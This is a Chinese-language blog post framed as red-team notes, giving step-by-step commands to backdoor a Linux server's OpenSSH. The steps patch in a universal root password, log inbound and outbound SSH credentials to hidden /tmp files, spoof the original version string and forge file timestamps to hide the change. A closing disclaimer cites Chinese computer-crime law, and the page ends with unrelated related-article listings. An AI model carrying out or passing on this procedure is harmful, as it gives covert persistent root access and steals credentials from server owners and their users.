红队渗透笔记之利用OpenSsh完成root劫持以及持久化利用

最新推荐文章于 2024-04-30 20:09:14 发布
最新推荐文章于 2024-04-30 20:09:14 发布
阅读量820 收藏 2
点赞数
分类专栏: 红队笔记 文章标签: ssh 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CoreNote/article/details/121725731
版权

在这里插入图片描述

下文将介绍如何使用OpenSsh完成;

1、root任意密码设置

2、将用户名与密码记录到log中

准备工作

1、明确ssh版本方便等将后续安装的openssh的版本号修改为原版本号

ssh -V

在这里插入图片描述

2、将原有ssh文件进行备份,方便一会为新安装的openssh同步时间属性

# 1、为了保存源文件的信息我们先做改名操作,后复制改名后的文件为源文件的样子(注意.bak文件保留着文件的原属性)
mv /etc/ssh/ /etc/ssh.bak/
mv /usr/sbin/sshd /usr/sbin/sshd.bak
mv /usr/sbin/sshd-keygen /usr/sbin/sshd-keygen.bak
# 2、复制改名后的文件为源文件的文件名(一会安装openssh会调用所以要备份一份)
cp -r ssh.bak/  /etc/ssh  
cp /usr/sbin/sshd.bak /usr/sbin/sshd
cp /usr/sbin/sshd-keygen.bak /usr/sbin/sshd-keygen

后门OPENSSH安装

此处需要准备两个文件

1、openssh-5.9p1.tar.gz

2、openssh-5.9p1.patch.tar.gz

操作步骤

1、将openssh-5.9p1.tar.gz,openssh-5.9p1.patch.tar.gz上传至目标服务器

2、分别解压openssh-5.9p1.tar.gz,openssh-5.9p1.patch.tar.gz

tar zxvf openssh-5.9p1.tar.gz 
tar zxvf openssh-5.9p1.patch.tar.gz

3、将patch文件(后门文件)复制到openssh安装包

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff

在这里插入图片描述
4、修改后⻔密码和⽂件记录

# 1、编辑includes
vi includes.h
# 2、修改ILOG,OLOG,SECRETPW
int secret_ok;
FILE *f;
#define ILOG "/tmp/.ilog" # 记录登录到本机的登录凭证(可以改为较为隐蔽的路径,此例在tmp下创建隐藏文件)
#define OLOG "/tmp/.olog" # 记录本机登录到远程的的登录凭证
#define SECRETPW "redteam" # 远程连接密码
#endif /* INCLUDES_H */

在这里插入图片描述

5、修改版本号为原本的版本号

vi version.h 
# 修改为当前OpenSSH的版本号
#define SSH_VERSION     "OpenSSH_7.4p1"

#define SSH_PORTABLE    "p1"

在这里插入图片描述

6、对/etc/ssh⾥⾯的⼏个key的权限进⾏修改,否则进⾏编译的时候会因为key不能修改⽽报错。

chmod 620 moduli
chmod 600 sshd_config ssh_host_ecdsa_key ssh_host_rsa_key
chmod 644 ssh_config ssh_host_ecdsa_key.pub ssh_host_rsa_key.pub

在这里插入图片描述
7、预编译

# 切换到安装文件所在路径
cd /tmp/ssh/openssh-5.9p1
# 必备依赖刷一波,避免编译时出现各种坑爹问题
yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc patch
# 执行预编译
./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5

在这里插入图片描述

8、伪造文件时间属性(访问和修改时间)

# 将前面文件的时间属性改为后面的文件属性
touch -r /etc/ssh/moduli /etc/ssh.bak/moduli 
touch -r /etc/ssh/ssh_config /etc/ssh.bak/ssh_config 
touch -r /etc/ssh/sshd_config /etc/ssh.bak/sshd_config 
touch -r /etc/ssh/ssh_host_dsa_key /etc/ssh.bak/ssh_host_dsa_key 
touch -r /etc/ssh/ssh_host_dsa_key.pub /etc/ssh.bak/ssh_host_dsa_key.pub 
touch -r /etc/ssh/ssh_host_ecdsa_key /etc/ssh.bak/ssh_host_ecdsa_key 
touch -r /etc/ssh/ssh_host_ecdsa_key.pub /etc/ssh.bak/ssh_host_ecdsa_key.pub 
touch -r /etc/ssh/ssh_host_ed25519_key /etc/ssh.bak/ssh_host_ed25519_key 
touch -r /etc/ssh/ssh_host_ed25519_key.pub /etc/ssh.bak/ssh_host_ed25519_key.pub 
touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh.bak/ssh_host_rsa_key 
touch -r /etc/ssh/ssh_host_rsa_key.pub /etc/ssh.bak/ssh_host_rsa_key.pub 
touch -r /usr/sbin/sshd /usr/sbin/sshd.bak 
touch -r /usr/sbin/sshd-keygen /usr/sbin/sshd-keygen.bak

9、重启服务

systemctl restart sshd.service

10、验证是否好用

后门密码登录
在这里插入图片描述

查看密码记录
在这里插入图片描述

为了您和您家人的幸福,请不要利用文中技术在用户未授权情况下开展渗透测试!!!

《中华人民共和国刑法》

第二百八十五条
违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
第二百八十六条
违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
故意制作、传播计算机病毒等破坏程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚

方寸明光
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
blackbear:openssh-portable的分支,用于渗透测试
05-18
Blackbear:openssh-portable的叉子,用于渗透测试。 免责声明:请勿在生产环境或任何面向公众的服务器上使用。 在参与夺旗大赛或研究计算机安全性时,仅在渗透测试环境中使用。 我进行了一些修改,这些修改严重降低了服务器的安全性。 Blackbear项目目标: blackbear服务器将用作RCE攻击的主要有效负载。 主要目标是拥有可靠的交互式外壳访问权限(必须能够运行top,sudo,screen,vi等),而不是手工制作的反向外壳meterpreter,后者允许基本命令但在交互式命令处失败。 次要目标是实现反向ssh shell操作。 这意味着服务器除了具有侦听传入连接的能力外,还必须能够建立tcp连接,反之亦然。 一旦服务器可以连接到客户端,ssh协议就会像往常一样发生,因此接收到连接的客户端将在服务器上获得外壳程序。 与往常一样,反向Shell操作的目的是
centos远程升级sshd到5.9p1并删除老版本ssh
kwame211的博客
08-08 1371
升级sshd可以增加安全性,当然要做到绝对安全是不可能的.下文只是简单的升级了下sshd. 1.升级sshd前准备 yum -y install gcc* make openssl openssl-devel perl pam pam-devel wget http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.
vulnhub-CH4INRULZ
Starr
03-10 1313
文章目录1. 信息搜集主机发现端口扫描目录扫描2. Exploitftp/sshhttp提权 文章目录1. 信息搜集主机发现端口扫描目录扫描2. Exploitftp/sshhttp提权 靶场地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 1. 信息搜集 主机发现 arp-scan 10.10.10.167 00:0c:29:c5:a1:1a VMware, Inc. 端口扫描 sudo nmap -Pn -O -sV 10.10.
HTB-oscplike-valentine+poison+sunday
m0_53302733的博客
03-31 1807
HTB-oscplike-valentine+poison+sunday Valentine easy难度的Valentine 靶机IP 10.10.10.79 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.79 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache htt
Linux OpenSSH后门的添加与防范
博文视点(北京)官方博客
02-09 1456
引言:相对于Windows,Linux操作系统的密码较难获取。不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的。 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之...
利用Openssh后门 劫持root密码
春风亭老王的博客
11-12 731
利用Openssh后门 劫持root密码 Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,那么怎么给添加OpenSSH后门以及防范后门呢? 安装依赖包 [root@DaMoWang
网络犯罪分子在新的代理劫持活动中劫持脆弱的SSH服务器
lavin1614
06-30 451
2023年6月8日发现最新活动的Akamai表示,该活动旨在攻破易受影响的SSH服务器,并部署一个混淆的Bash脚本,而该脚本又具备从被破坏的网络服务器中获取必要的依赖性,包括通过伪装成CSS文件("csdark.css")来获取curl命令行工具。与加密劫持不同的是,在加密劫持中,被破坏的系统资源被用来非法挖掘加密货币,而代理劫持则为威胁者提供了利用受害者未使用的带宽,作为P2P节点隐蔽地运行不同服务的能力。一个活跃的金融活动针对的是脆弱的SSH服务器,以隐蔽地将它们纳入一个代理网络。
CTF训练笔记(二)- SSH渗透root主机
morrino的博客
01-10 2940
在对SSH服务的渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶机,偶尔可能还需要暴力破解密码。 CTF中要特别注意: /tmp 数据缓存目录; /etc/crontab 定时任务文件。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF训练笔记- SSH渗透root主机
llrraa2010的专栏
03-11 336
如果虚拟机网络桥接在WiFi接口上,虚拟机是用DHCP的,那么就会跟WiFi接口同一个网段。用nmap 扫描网段获得IP,或者单机模式进入虚拟机查看IP。修改网络设置重启即可恢复正常。但是错误信息会一直保留在界面上,不要被误导以为还有问题。
红队渗透打点工具-FindUpload
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
openssh_v7.4
03-10
openssh_v7.4 升级包
openssh5.3.tar
08-16
openssh5.3.tar
openssh the most latest version 5.3
08-11
openssh the most latest version 5.3 you will need openssl to compile this
近源渗透红队视角WiFi.pdf
03-24
无线网络已经事实上成为了企业移动化办公的重 要基础设施,但由于普遍缺乏有效的管理,部署与 使用人员的安全意识和专业知识的不足,导致AP分 布混乱,设备安全性脆弱,无线网络也越来越多的 成为黑客入侵企业内网...
DeathMetal:红队渗透测试工具可利用英特尔AMT的功能
05-01
工具以“ dm_”为前缀,以帮助完成制表符和识别。 dm_pickles-Duckyscript解释器,可通过AMT KVM(vnc)进行通信并注入击键。 dm_toki-IDE-R实现-使您可以将floopy和CD映像远程连接到目标计算机。 dm_nathan-是...
渗透测试/红队/src全方位测试字典
09-01
这是安全测试人员的伴侣。它是安全评估期间使用的多种类型的列表的集合,收集在一个位置。列表类型包括用户名、密码、...目标是使安全测试人员能够将此存储库拉到新的测试框中,并可以访问可能需要的每种类型的列表。
红队综合渗透框架SatanSword
01-14
web指纹识别,集成whatweb及wappalyzer所有指纹及自己收集的web服务器指纹1839条+cms指纹1936条。 漏洞PoC检测,提供360+PoC检测脚本内置在数据库中,同时支持漏洞查询和代码查看及一键批量检测功能。...
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 507
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
最新发布
南七小僧的学海无涯
04-30 526
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
红队渗透测试lampiao
09-14
lampiao是一个用于红队渗透测试的虚拟机靶机。根据引用提供的信息,你可以通过以下步骤来进行该渗透测试: 1. 下载lampiao虚拟机:你可以从"https://download.vulnhub.com/lampiao/Lampiao.zip"下载lampiao虚拟机。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方寸明光

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值